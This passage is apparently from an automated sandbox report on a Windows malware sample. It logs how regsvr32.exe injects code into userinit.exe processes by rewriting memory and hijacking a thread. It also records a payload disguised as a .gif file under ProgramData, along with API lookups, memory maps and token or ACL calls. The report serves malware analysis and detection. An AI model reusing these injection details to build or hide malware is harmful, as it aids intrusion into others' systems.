Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 3018735	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #62: userinit.exe

222

0

»

Information	Value
ID	#62
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:00, Reason: Child Process
Unmonitor	End Time: 00:04:03, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xaa0
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9A8 0x 9B4 0x AB0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00126fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	rw	-
private_0x0000000000140000	0x00140000	0x0014ffff	Private Memory	rw	-
private_0x0000000000150000	0x00150000	0x001cffff	Private Memory	rw	-
oleaccrc.dll	0x001d0000	0x001d0fff	Memory Mapped File	r	-
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	rwx	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x003b7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003c0000	0x003c0000	0x003c1fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x003d0000	0x003d0fff	Memory Mapped File	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x00000000006c0000	0x006c0000	0x006cffff	Private Memory	rw	-
private_0x00000000006d0000	0x006d0000	0x0078ffff	Private Memory	rw	-
pagefile_0x0000000000790000	0x00790000	0x0086efff	Pagefile Backed Memory	r	-
private_0x0000000000870000	0x00870000	0x00a8ffff	Private Memory	rw	-
private_0x0000000000870000	0x00870000	0x0097cfff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a00fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a04fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a08fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a0cfff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a10fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a14fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a18fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a1cfff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a20fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a24fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a28fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a2cfff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a30fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a34fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a38fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a3cfff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a40fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a44fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a48fff	Private Memory	rw	-
private_0x0000000000980000	0x00980000	0x00a4cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x009cffff	Private Memory	rw	-
private_0x0000000000a50000	0x00a50000	0x00a8ffff	Private Memory	rw	-
private_0x0000000000a90000	0x00a90000	0x00b8ffff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c12fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c16fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c1afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c1efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c22fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c26fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c2afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c2efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c32fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c36fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c3afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c3efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c42fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c46fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c4afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c4efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c52fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c56fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c5afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c5efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c62fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c66fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c6afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c6efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c72fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c76fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c7afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c7efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c82fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c86fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c8afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c8efff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c92fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c96fff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c9afff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00c9ffff	Private Memory	-	-
userinit.exe	0x00cf0000	0x00cf8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d00000	0x00d00000	0x018fffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01900000	0x0222ffff	Memory Mapped File	r	-
pagefile_0x0000000002230000	0x02230000	0x02622fff	Pagefile Backed Memory	r	-
private_0x0000000002630000	0x02630000	0x0282ffff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02900fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02904fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02908fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0290cfff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02910fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02914fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02918fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0291cfff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02920fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02924fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02928fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292cfff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02930fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02934fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02938fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0293cfff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a52fff	Private Memory	rwx	-
private_0x0000000002a60000	0x02a60000	0x02b5ffff	Private Memory	-	-
private_0x0000000002bc0000	0x02bc0000	0x02cbffff	Private Memory	rw	-
sortdefault.nls	0x02cc0000	0x02f8efff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdd008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x9a8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Lì, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1118191	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #63: userinit.exe

222

0

»

Information	Value
ID	#63
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:09, Reason: Child Process
Unmonitor	End Time: 00:04:13, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xae8
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AFC 0x B04 0x B08

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x0010ffff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x0011ffff	Private Memory	rw	-
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	rwx	-
pagefile_0x0000000000130000	0x00130000	0x00136fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000140000	0x00140000	0x00141fff	Pagefile Backed Memory	rw	-
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00257fff	Pagefile Backed Memory	r	-
private_0x0000000000260000	0x00260000	0x002dffff	Private Memory	rw	-
oleaccrc.dll	0x002e0000	0x002e0fff	Memory Mapped File	r	-
private_0x00000000002f0000	0x002f0000	0x002f0fff	Private Memory	rwx	-
private_0x0000000000300000	0x00300000	0x003fffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
